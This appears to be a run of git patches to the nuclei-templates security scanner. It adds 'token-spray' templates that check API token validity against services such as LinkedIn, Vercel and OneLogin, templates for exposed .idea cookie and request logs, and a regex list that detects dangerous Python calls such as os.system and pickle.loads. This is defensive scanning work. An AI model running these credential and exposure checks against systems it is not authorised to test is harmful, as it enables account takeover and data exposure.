status status: - - 200 \ No newline at end of file + - 200 From 393034a4940224871ddb00a406ca3f2a36a50a2b Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Sat, 23 Oct 2021 21:13:04 +0700 Subject: [PATCH 3114/4083] Add LinkedIn API test --- token-spray/linkedin.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 token-spray/linkedin.yaml diff --git a/token-spray/linkedin.yaml b/token-spray/linkedin.yaml new file mode 100644 index 0000000000..611f28d422 --- /dev/null +++ b/token-spray/linkedin.yaml @@ -0,0 +1,26 @@ +id: api-linkedin + +info: + name: LinkedIn API Test + author: dwisiswant0 + reference: https://docs.microsoft.com/en-us/linkedin/compliance/ + severity: info + tags: token-spray,linkedin + +self-contained: true +requests: + - method: GET + path: + - "https://api.linkedin.com/v2/me?oauth2_access_token={{token}}" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + negative: true + words: + - "serviceErrorCode" \ No newline at end of file From 80301e3f63ed74d8fa1e1ad530d3ac76e947170f Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 23 Oct 2021 23:34:49 +0530 Subject: [PATCH 3115/4083] Added Wildcard postMessage detection --- misconfiguration/wildcard-postmessage.yaml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 misconfiguration/wildcard-postmessage.yaml diff --git a/misconfiguration/wildcard-postmessage.yaml b/misconfiguration/wildcard-postmessage.yaml new file mode 100644 index 0000000000..dd396fc711 --- /dev/null +++ b/misconfiguration/wildcard-postmessage.yaml @@ -0,0 +1,18 @@ +id: wildcard-postmessage + +info: + name: Wildcard postMessage detection + author: pdteam + severity: info + tags: xss + reference: https://jlajara.gitlab.io/web/2020/06/12/Dom_XSS_PostMessage.html + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: word + words: + - "postMessage(msg,'*')" From 7545a8df796bfbdad3177908323f14e959fd0daa Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 23 Oct 2021 18:05:17 +0000 Subject: [PATCH 3116/4083] Auto README Update [Sat Oct 23 18:05:17 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 014ebb0a6a..47d02bb65e 100644 --- a/README.md +++ b/README.md @@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags, | wp-plugin | 178 | princechaddha | 66 | default-logins | 60 | | | | | | cve2020 | 166 | madrobot | 63 | file | 50 | | | | | -**176 directories, 2416 files**. +**176 directories, 2418 files**. From 4bd6ff723e96cfd452a91794955715a194e26e10 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Sun, 24 Oct 2021 08:27:09 +0700 Subject: [PATCH 3117/4083] Add negative regex matcher --- token-spray/paypal.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/token-spray/paypal.yaml b/token-spray/paypal.yaml index 9e44a47404..a880ee9976 100644 --- a/token-spray/paypal.yaml +++ b/token-spray/paypal.yaml @@ -16,7 +16,13 @@ requests: Content-Type: application/json Authorization: Bearer {{token}} + matchers-condition: and matchers: - type: status status: - - 200 \ No newline at end of file + - 200 + + - type: regex + negative: true + regex: + - "error(_description)?" \ No newline at end of file From d24757cf8972cdc131e5bc60d73b346b557ab25c Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Sun, 24 Oct 2021 08:42:58 +0700 Subject: [PATCH 3118/4083] Add Optimizely API test --- token-spray/optimizely.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 token-spray/optimizely.yaml diff --git a/token-spray/optimizely.yaml b/token-spray/optimizely.yaml new file mode 100644 index 0000000000..8743b893fc --- /dev/null +++ b/token-spray/optimizely.yaml @@ -0,0 +1,27 @@ +id: api-optimizely + +info: + name: Optimizely API Test + author: dwisiswant0 + reference: https://library.optimizely.com/docs/api/app/v2/index.html + severity: info + tags: token-spray,optimizely + +self-contained: true +requests: + - method: GET + path: + - "https://api.optimizely.com/v2/projects" + headers: + Authorization: Bearer {{token}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "account_id" From 9109ab1254f71e562e58b063e985e47e6707b120 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Sun, 24 Oct 2021 09:02:48 +0700 Subject: [PATCH 3119/4083] Add OneLogin API test --- token-spray/onelogin.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 token-spray/onelogin.yaml diff --git a/token-spray/onelogin.yaml b/token-spray/onelogin.yaml new file mode 100644 index 0000000000..3502fc31fa --- /dev/null +++ b/token-spray/onelogin.yaml @@ -0,0 +1,24 @@ +id: api-onelogin + +info: + name: OneLogin API Test + author: dwisiswant0 + reference: https://api.us.onelogin.com/api/2/users?fields=id,firstname,lastname,custom_attributes + severity: info + tags: token-spray,onelogin + + # Recommended ran with -spm/-stop-at-first-path flag + +self-contained: true +requests: + - method: GET + path: + - "https://api.us.onelogin.com/api/2/users?fields=id" + - "https://api.eu.onelogin.com/api/2/users?fields=id" + headers: + Authorization: Bearer {{token}} + + matchers: + - type: status + status: + - 200 From 04124230f5c0461ca9d562bcdf11ec24d95c70fe Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Sun, 24 Oct 2021 09:04:15 +0700 Subject: [PATCH 3120/4083] Update references --- token-spray/onelogin.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/token-spray/onelogin.yaml b/token-spray/onelogin.yaml index 3502fc31fa..4cd1f36a1a 100644 --- a/token-spray/onelogin.yaml +++ b/token-spray/onelogin.yaml @@ -3,7 +3,7 @@ id: api-onelogin info: name: OneLogin API Test author: dwisiswant0 - reference: https://api.us.onelogin.com/api/2/users?fields=id,firstname,lastname,custom_attributes + reference: https://developers.onelogin.com/api-docs/2/getting-started/dev-overview severity: info tags: token-spray,onelogin From bc478168a1a807422654ce5721b18a7f1dac9241 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Sun, 24 Oct 2021 09:08:57 +0700 Subject: [PATCH 3121/4083] Add stop-at-first-match --- token-spray/onelogin.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/token-spray/onelogin.yaml b/token-spray/onelogin.yaml index 4cd1f36a1a..af06f0f204 100644 --- a/token-spray/onelogin.yaml +++ b/token-spray/onelogin.yaml @@ -18,6 +18,7 @@ requests: headers: Authorization: Bearer {{token}} + stop-at-first-match: true matchers: - type: status status: From 40c0a14c3e9e088060f8baacd562173fb87b9373 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Sun, 24 Oct 2021 09:17:04 +0700 Subject: [PATCH 3122/4083] Apigee Edge API test --- token-spray/apigee-edge.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 token-spray/apigee-edge.yaml diff --git a/token-spray/apigee-edge.yaml b/token-spray/apigee-edge.yaml new file mode 100644 index 0000000000..52c95af31a --- /dev/null +++ b/token-spray/apigee-edge.yaml @@ -0,0 +1,28 @@ +id: api-apigee-edge + +info: + name: Apigee Edge API Test + author: dwisiswant0 + reference: https://apidocs.apigee.com/apis + severity: info + tags: token-spray,apigee + +self-contained: true +requests: + - method: GET + path: + - "https://apimonitoring.enterprise.apigee.com/alerts" + headers: + Authorization: Bearer {{token}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "fault" + negative: true From de0bf0ce9a99daa2533b0af1480209881eb13afc Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Sun, 24 Oct 2021 09:25:47 +0700 Subject: [PATCH 3123/4083] Add FortiToken Cloud API test --- token-spray/fortitoken-cloud.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 token-spray/fortitoken-cloud.yaml diff --git a/token-spray/fortitoken-cloud.yaml b/token-spray/fortitoken-cloud.yaml new file mode 100644 index 0000000000..a2b374b44d --- /dev/null +++ b/token-spray/fortitoken-cloud.yaml @@ -0,0 +1,28 @@ +id: api-fortitoken-cloud + +info: + name: FortiToken Cloud API Test + author: dwisiswant0 + reference: https://docs.fortinet.com/document/fortitoken-cloud/latest/rest-api/456035/overview + severity: info + tags: token-spray,fortitoken-cloud + +self-contained: true +requests: + - method: GET + path: + - "https://ftc.fortinet.com:9696/api/v1/user" + headers: + Authorization: Bearer {{token}} + + matchers: + - type: regex + part: body + regex: + - "(?:notification_method|mobile_number|(?:c(?:ustomer|lient)_i|(?:realm_|(?:user_)?)i)d|auth_method|fail_times|(?:updated|created|bypass)_at|lockout_at|user(?:_data|name)|active|realm|email)" + + - type: regex + part: body + regex: + - "error_(code|message|name)" + negative: true From 439ad4c5183373592b4328c1370ba034267fba39 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Sun, 24 Oct 2021 09:27:27 +0700 Subject: [PATCH 3124/4083] Revert regex matcher with status code & using matcher condition --- token-spray/fortitoken-cloud.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/token-spray/fortitoken-cloud.yaml b/token-spray/fortitoken-cloud.yaml index a2b374b44d..0785e4a98c 100644 --- a/token-spray/fortitoken-cloud.yaml +++ b/token-spray/fortitoken-cloud.yaml @@ -15,11 +15,11 @@ requests: headers: Authorization: Bearer {{token}} + matchers-condition: and matchers: - - type: regex - part: body - regex: - - "(?:notification_method|mobile_number|(?:c(?:ustomer|lient)_i|(?:realm_|(?:user_)?)i)d|auth_method|fail_times|(?:updated|created|bypass)_at|lockout_at|user(?:_data|name)|active|realm|email)" + - type: status + status: + - 200 - type: regex part: body From fd212a9f2c091916b89fe6d4305bcc3b0c73b4eb Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Sun, 24 Oct 2021 11:28:51 +0700 Subject: [PATCH 3125/4083] Add FontAwesome API test --- token-spray/fontawesome.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 token-spray/fontawesome.yaml diff --git a/token-spray/fontawesome.yaml b/token-spray/fontawesome.yaml new file mode 100644 index 0000000000..10ec8d5ff5 --- /dev/null +++ b/token-spray/fontawesome.yaml @@ -0,0 +1,28 @@ +id: api-fontawesome + +info: + name: FontAwesome API Test + author: dwisiswant0 + reference: https://fontawesome.com/v6.0/docs/apis/graphql/get-started + severity: info + tags: token-spray,fontawesome + +self-contained: true +requests: + - method: GET + path: + - "https://api.fontawesome.com/token" + headers: + Authorization: Bearer {{token}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "No active API token" + negative: true From ec6db6df110a364e3774323561e2617d0a887610 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Sun, 24 Oct 2021 10:18:17 +0530 Subject: [PATCH 3126/4083] Update fortitoken-cloud.yaml --- token-spray/fortitoken-cloud.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/token-spray/fortitoken-cloud.yaml b/token-spray/fortitoken-cloud.yaml index 0785e4a98c..3a49a9a760 100644 --- a/token-spray/fortitoken-cloud.yaml +++ b/token-spray/fortitoken-cloud.yaml @@ -5,7 +5,7 @@ info: author: dwisiswant0 reference: https://docs.fortinet.com/document/fortitoken-cloud/latest/rest-api/456035/overview severity: info - tags: token-spray,fortitoken-cloud + tags: token-spray,fortinet self-contained: true requests: From 6cb9546ee6bd4be6e96feedae48206adccbda6eb Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Sun, 24 Oct 2021 10:22:10 +0530 Subject: [PATCH 3127/4083] Update onelogin.yaml --- token-spray/onelogin.yaml | 2 -- 1 file changed, 2 deletions(-) diff --git a/token-spray/onelogin.yaml b/token-spray/onelogin.yaml index af06f0f204..f57001c5f9 100644 --- a/token-spray/onelogin.yaml +++ b/token-spray/onelogin.yaml @@ -7,8 +7,6 @@ info: severity: info tags: token-spray,onelogin - # Recommended ran with -spm/-stop-at-first-path flag - self-contained: true requests: - method: GET From 0e7c14a39b01e76fcbf350297fa9954458803871 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Sun, 24 Oct 2021 11:58:52 +0700 Subject: [PATCH 3128/4083] Add Tink API test --- token-spray/tink.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 token-spray/tink.yaml diff --git a/token-spray/tink.yaml b/token-spray/tink.yaml new file mode 100644 index 0000000000..a7c5de8ccd --- /dev/null +++ b/token-spray/tink.yaml @@ -0,0 +1,25 @@ +id: api-tink + +info: + name: Tink API Test + author: dwisiswant0 + reference: https://docs.tink.com/api + severity: info + tags: token-spray,tink + +self-contained: true +requests: + - method: GET + path: + - "https://api.tink.com/api/v1/user" + headers: + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - "appId" + - "externalUserId" + - "username" + condition: and From 7d155922fc253e92d286033e72e48058d0422164 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Sun, 24 Oct 2021 12:11:51 +0700 Subject: [PATCH 3129/4083] Add Particle Cloud API test --- token-spray/particle.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 token-spray/particle.yaml diff --git a/token-spray/particle.yaml b/token-spray/particle.yaml new file mode 100644 index 0000000000..38bdacdad0 --- /dev/null +++ b/token-spray/particle.yaml @@ -0,0 +1,26 @@ +id: api-particle + +info: + name: Particle Cloud API Test + author: dwisiswant0 + reference: https://docs.particle.io/reference + severity: info + tags: token-spray,particle + +self-contained: true +requests: + - method: GET + path: + - "https://api.particle.io/v1/user?access_token={{token}}" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "error" + negative: true From 32aa40f0133c1e664c32363bb2d009a72783409b Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Sun, 24 Oct 2021 12:16:31 +0700 Subject: [PATCH 3130/4083] Add Vercel API test --- token-spray/vercel.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 token-spray/vercel.yaml diff --git a/token-spray/vercel.yaml b/token-spray/vercel.yaml new file mode 100644 index 0000000000..f273244b1d --- /dev/null +++ b/token-spray/vercel.yaml @@ -0,0 +1,23 @@ +id: api-vercel + +info: + name: Vercel API Test + author: dwisiswant0 + reference: https://vercel.com/docs/rest-api + severity: info + tags: token-spray,vercel + +self-contained: true +requests: + - method: GET + path: + - "https://api.vercel.com/www/user" + headers: + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - "error" + negative: true From c62ed7909dcaff91457e243a93402ba30bfb3433 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Sun, 24 Oct 2021 12:32:29 +0700 Subject: [PATCH 3131/4083] Add Netlify API test --- token-spray/netlify.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 token-spray/netlify.yaml diff --git a/token-spray/netlify.yaml b/token-spray/netlify.yaml new file mode 100644 index 0000000000..b282f7acd9 --- /dev/null +++ b/token-spray/netlify.yaml @@ -0,0 +1,21 @@ +id: api-netlify + +info: + name: Netlify API Test + author: dwisiswant0 + reference: https://docs.netlify.com/api/get-started/ + severity: info + tags: token-spray,netlify + +self-contained: true +requests: + - method: GET + path: + - "https://api.netlify.com/api/v1/sites" + headers: + Authorization: Bearer {{token}} + + matchers: + - type: status + status: + - 200 From 843a0c399f05753b9e0630c9ae58f96fef056966 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Sun, 24 Oct 2021 12:35:48 +0700 Subject: [PATCH 3132/4083] Add Intercom API test --- token-spray/intercom.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 token-spray/intercom.yaml diff --git a/token-spray/intercom.yaml b/token-spray/intercom.yaml new file mode 100644 index 0000000000..ba05806d86 --- /dev/null +++ b/token-spray/intercom.yaml @@ -0,0 +1,24 @@ +id: api-intercom + +info: + name: Intercom API Test + author: dwisiswant0 + reference: https://developers.intercom.com/building-apps/docs/rest-api-reference + severity: info + tags: token-spray,intercom + +self-contained: true +requests: + - method: GET + path: + - "https://api.intercom.io/users" + headers: + Authorization: Bearer {{token}} + Accept: application/json + + matchers: + - type: word + part: body + words: + - "error" + negative: true From 455d585990f64d5e46037206a6f4a2afac2eb333 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 24 Oct 2021 13:41:44 +0530 Subject: [PATCH 3133/4083] Update intercom.yaml --- token-spray/intercom.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/token-spray/intercom.yaml b/token-spray/intercom.yaml index ba05806d86..5c0dc15191 100644 --- a/token-spray/intercom.yaml +++ b/token-spray/intercom.yaml @@ -20,5 +20,5 @@ requests: - type: word part: body words: - - "error" + - "Access Token Invalid" negative: true From 31a7d28c93580750c46cf003263da356f08d8eca Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 24 Oct 2021 13:49:58 +0530 Subject: [PATCH 3134/4083] Update and rename vercel.yaml to api-vercel.yaml --- token-spray/{vercel.yaml => api-vercel.yaml} | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) rename token-spray/{vercel.yaml => api-vercel.yaml} (80%) diff --git a/token-spray/vercel.yaml b/token-spray/api-vercel.yaml similarity index 80% rename from token-spray/vercel.yaml rename to token-spray/api-vercel.yaml index f273244b1d..757d267268 100644 --- a/token-spray/vercel.yaml +++ b/token-spray/api-vercel.yaml @@ -19,5 +19,7 @@ requests: - type: word part: body words: - - "error" - negative: true + - '"user":' + - '"username":' + - '"email":' + condition: and From a39c120498ba0c22eaf5229a96d43963ebce6e3e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 24 Oct 2021 13:56:44 +0530 Subject: [PATCH 3135/4083] Update and rename particle.yaml to api-particle.yaml --- token-spray/{particle.yaml => api-particle.yaml} | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) rename token-spray/{particle.yaml => api-particle.yaml} (84%) diff --git a/token-spray/particle.yaml b/token-spray/api-particle.yaml similarity index 84% rename from token-spray/particle.yaml rename to token-spray/api-particle.yaml index 38bdacdad0..447f87a4a7 100644 --- a/token-spray/particle.yaml +++ b/token-spray/api-particle.yaml @@ -3,8 +3,8 @@ id: api-particle info: name: Particle Cloud API Test author: dwisiswant0 - reference: https://docs.particle.io/reference severity: info + reference: https://docs.particle.io/reference tags: token-spray,particle self-contained: true @@ -22,5 +22,6 @@ requests: - type: word part: body words: - - "error" - negative: true + - '"account_info":' + - '"username":' + condition: and From bf5e521ae8665d970baff3909505b6c0b0886e83 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 24 Oct 2021 13:57:05 +0530 Subject: [PATCH 3136/4083] Update api-vercel.yaml --- token-spray/api-vercel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/token-spray/api-vercel.yaml b/token-spray/api-vercel.yaml index 757d267268..0c3baed35a 100644 --- a/token-spray/api-vercel.yaml +++ b/token-spray/api-vercel.yaml @@ -3,8 +3,8 @@ id: api-vercel info: name: Vercel API Test author: dwisiswant0 - reference: https://vercel.com/docs/rest-api severity: info + reference: https://vercel.com/docs/rest-api tags: token-spray,vercel self-contained: true From 62643edb222c999466d761185adf87ed571cdc39 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 24 Oct 2021 14:23:37 +0530 Subject: [PATCH 3137/4083] Update idea-folder-exposure.yaml --- exposures/files/idea-folder-exposure.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/exposures/files/idea-folder-exposure.yaml b/exposures/files/idea-folder-exposure.yaml index d3d57a227d..b3cc98ea1d 100644 --- a/exposures/files/idea-folder-exposure.yaml +++ b/exposures/files/idea-folder-exposure.yaml @@ -10,7 +10,6 @@ info: requests: - method: GET path: - - "{{BaseURL}}/.idea/httpRequests/http-requests-log.http" - "{{BaseURL}}/.idea/deployment.xml" - "{{BaseURL}}/.idea/workspace.xml" @@ -18,3 +17,10 @@ requests: - type: status status: - 200 + + - type: word + words: + - " Date: Sun, 24 Oct 2021 14:25:40 +0530 Subject: [PATCH 3138/4083] Create idea-logs-exposure.yaml --- exposures/logs/idea-logs-exposure.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 exposures/logs/idea-logs-exposure.yaml diff --git a/exposures/logs/idea-logs-exposure.yaml b/exposures/logs/idea-logs-exposure.yaml new file mode 100644 index 0000000000..4a48e0fccb --- /dev/null +++ b/exposures/logs/idea-logs-exposure.yaml @@ -0,0 +1,26 @@ +id: idea-logs-exposure + +info: + name: Public .idea Folder containing http logs + author: martincodes-de + severity: info + description: Searches for .idea Folder for http-requests-log.http and http-client.cookies file + tags: phpstorm,jetbrains,idea,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/.idea/httpRequests/http-requests-log.http" + - "{{BaseURL}}/.idea/httpRequests/http-client.cookies" + + matchers-condition: or + matchers: + - type: regex + regex: + - '(?m)^(GET|POST) https?:\/\/' + part: body + + - type: word + words: + - "# domain path name value date" + part: body From 918c437dee396230943bb1e228fa79bbaaeb709b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 24 Oct 2021 14:32:00 +0530 Subject: [PATCH 3139/4083] Update idea-folder-exposure.yaml --- exposures/files/idea-folder-exposure.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/files/idea-folder-exposure.yaml b/exposures/files/idea-folder-exposure.yaml index b3cc98ea1d..e29e9fa971 100644 --- a/exposures/files/idea-folder-exposure.yaml +++ b/exposures/files/idea-folder-exposure.yaml @@ -13,6 +13,7 @@ requests: - "{{BaseURL}}/.idea/deployment.xml" - "{{BaseURL}}/.idea/workspace.xml" + matchers-condition: and matchers: - type: status status: From 8ad49535b0cbbcecbcff782c97ec2438f1bd878f Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 24 Oct 2021 12:38:06 +0300 Subject: [PATCH 3140/4083] Add description --- vulnerabilities/other/processmaker-lfi.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/processmaker-lfi.yaml b/vulnerabilities/other/processmaker-lfi.yaml index 824c545e2f..2aecb1c745 100644 --- a/vulnerabilities/other/processmaker-lfi.yaml +++ b/vulnerabilities/other/processmaker-lfi.yaml @@ -4,6 +4,7 @@ info: name: ProcessMaker <= 3.5.4 Directory Traversal author: KrE80r severity: high + description: A vulnerability in ProcessMaker allows remote attackers to access arbitrary files and disclose their content. reference: - https://www.exploit-db.com/exploits/50229 - https://www.processmaker.com From 1eb3e16ea1a7390c6a41a85912fd12e2607b3f0b Mon Sep 17 00:00:00 2001 From: majid Date: Sun, 24 Oct 2021 16:48:44 +0330 Subject: [PATCH 3141/4083] Add file/python --- file/python/python-scanner.yaml | 49 +++++++++++++++++++++++++++++++++ 1 file changed, 49 insertions(+) create mode 100644 file/python/python-scanner.yaml diff --git a/file/python/python-scanner.yaml b/file/python/python-scanner.yaml new file mode 100644 index 0000000000..7fc05334ae --- /dev/null +++ b/file/python/python-scanner.yaml @@ -0,0 +1,49 @@ +id: python-scanner + +info: + name: Python Scanner + author: majidmc2 + severity: info + description: Scan for dangerous Python functions. + reference: https://www.kevinlondon.com/2015/07/26/dangerous-python-functions.html, https://www.kevinlondon.com/2015/08/15/dangerous-python-functions-pt2.html + tags: python,file + + +file: + - extensions: + - py + + extractors: + - type: regex + name: Possibility of SQLi vulnerability Code Injection + regex: + - 'exec' + - 'eval' + - '__import__' + + + - type: regex + name: The Command Injection Series + regex: + - 'subprocess.call\(.*shell=True.*\)' + - 'os.system' + - 'os.popen' + + + - type: regex + name: The pickle module is not secure + regex: + - 'pickle.loads' + - 'cPickle.loads' + + + - type: regex + name: Loading dangerous YAMLs + regex: + - 'yaml.load' + + + - type: regex + name: Possibility of SQLi vulnerability + regex: + - 'cursor.execute' \ No newline at end of file From e00016bfc1544dff319f5991021a25a05ba8ad94 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 24 Oct 2021 22:52:20 +0530 Subject: [PATCH 3142/4083] Create zeroshell-login.yaml --- exposed-panels/zeroshell-login.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposed-panels/zeroshell-login.yaml diff --git a/exposed-panels/zeroshell-login.yaml b/exposed-panels/zeroshell-login.yaml new file mode 100644 index 0000000000..cdaabf8b66 --- /dev/null +++ b/exposed-panels/zeroshell-login.yaml @@ -0,0 +1,23 @@ +id: zeroshell-login + +info: + name: ZeroShell Login + author: dhiyaneshDK + severity: info + tags: panel + metadata: + shodan-query: 'http.title:"ZeroShell"' + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'ZeroShell' + - type: status + status: + - 200 From a8ab2d487ae278aeb3f3b45c0f0a6a78799bd2a0 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 24 Oct 2021 22:57:46 +0530 Subject: [PATCH 3143/4083] Create workresources-rdp.yaml --- exposed-panels/workresources-rdp.yaml | 28 +++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 exposed-panels/workresources-rdp.yaml diff --git a/exposed-panels/workresources-rdp.yaml b/exposed-panels/workresources-rdp.yaml new file mode 100644 index 0000000000..6097220ed9 --- /dev/null +++ b/exposed-panels/workresources-rdp.yaml @@ -0,0 +1,28 @@ +id: workresources-rdp + +info: + name: Work Resources RemoteApp and Desktop Connection + author: dhiyaneshDK + severity: info + tags: panel + metadata: + shodan-query: 'http.title:"RD Web Access"' + +requests: + - method: GET + path: + - '{{BaseURL}}/RDWeb/Pages/en-US/login.aspx' + + matchers-condition: and + matchers: + - type: word + words: + - 'RD Web Access' + - 'WorkSpaceID' + - 'PublicModeTimeout' + - 'RedirectorName' + - 'tdClaimsDomainUserNameLable' + - 'trPasswordExpiredNoChange' + - type: status + status: + - 200 From 99d1ed68f3dfd35b7df8f77a76d703c92cfec95a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 24 Oct 2021 23:01:43 +0530 Subject: [PATCH 3144/4083] Create forcepoint-applicance.yaml --- exposed-panels/forcepoint-applicance.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposed-panels/forcepoint-applicance.yaml diff --git a/exposed-panels/forcepoint-applicance.yaml b/exposed-panels/forcepoint-applicance.yaml new file mode 100644 index 0000000000..7aa165dfbb --- /dev/null +++ b/exposed-panels/forcepoint-applicance.yaml @@ -0,0 +1,23 @@ +id: forcepoint-applicance + +info: + name: Forcepoint Appliance + author: dhiyaneshDK + severity: info + tags: panel + metadata: + shodan-query: 'http.title:"Forcepoint Appliance"' + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Forcepoint Appliance' + - type: status + status: + - 200 From 3d1362d2c66a978cfa57309cf6392900dc3cfb4c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 24 Oct 2021 23:05:37 +0530 Subject: [PATCH 3145/4083] Create pure-storage-login.yaml --- exposed-panels/pure-storage-login.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposed-panels/pure-storage-login.yaml diff --git a/exposed-panels/pure-storage-login.yaml b/exposed-panels/pure-storage-login.yaml new file mode 100644 index 0000000000..7b17cd25c5 --- /dev/null +++ b/exposed-panels/pure-storage-login.yaml @@ -0,0 +1,23 @@ +id: pure-storage-login + +info: + name: Pure Storage Login + author: dhiyaneshDK + severity: info + tags: panel + metadata: + shodan-query: 'http.title:"Pure Storage Login"' + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Pure Storage Login' + - type: status + status: + - 200 From 25a41dfc9f40e716816e12ba64cb6623c1a4411c Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Mon, 25 Oct 2021 07:03:44 +0700 Subject: [PATCH 3146/4083] Add Strava API test --- token-spray/strava.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 token-spray/strava.yaml diff --git a/token-spray/strava.yaml b/token-spray/strava.yaml new file mode 100644 index 0000000000..cbe7b3cf90 --- /dev/null +++ b/token-spray/strava.yaml @@ -0,0 +1,23 @@ +id: api-strava + +info: + name: Strava API Test + author: dwisiswant0 + reference: https://developers.strava.com/docs/getting-started/ + severity: info + tags: token-spray,strava + +self-contained: true +requests: + - method: GET + path: + - "https://www.strava.com/api/v3/athlete" + headers: + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - "errors" + negative: true From f3919aac81f0f7b2b923a0f9ebc2f79fd782d944 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Mon, 25 Oct 2021 07:16:24 +0700 Subject: [PATCH 3147/4083] Add Taiga API test --- token-spray/taiga.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 token-spray/taiga.yaml diff --git a/token-spray/taiga.yaml b/token-spray/taiga.yaml new file mode 100644 index 0000000000..b22fc01cf8 --- /dev/null +++ b/token-spray/taiga.yaml @@ -0,0 +1,23 @@ +id: api-taiga + +info: + name: Taiga API Test + author: dwisiswant0 + reference: https://docs.taiga.io/api.html + severity: info + tags: token-spray,taiga + +self-contained: true +requests: + - method: GET + path: + - "https://api.taiga.io/api/v1/application-tokens" + headers: + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - "token_not_valid" + negative: true From cedf73c3f5f81eb0d51a646747e4abda4f5b4497 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Mon, 25 Oct 2021 07:19:47 +0700 Subject: [PATCH 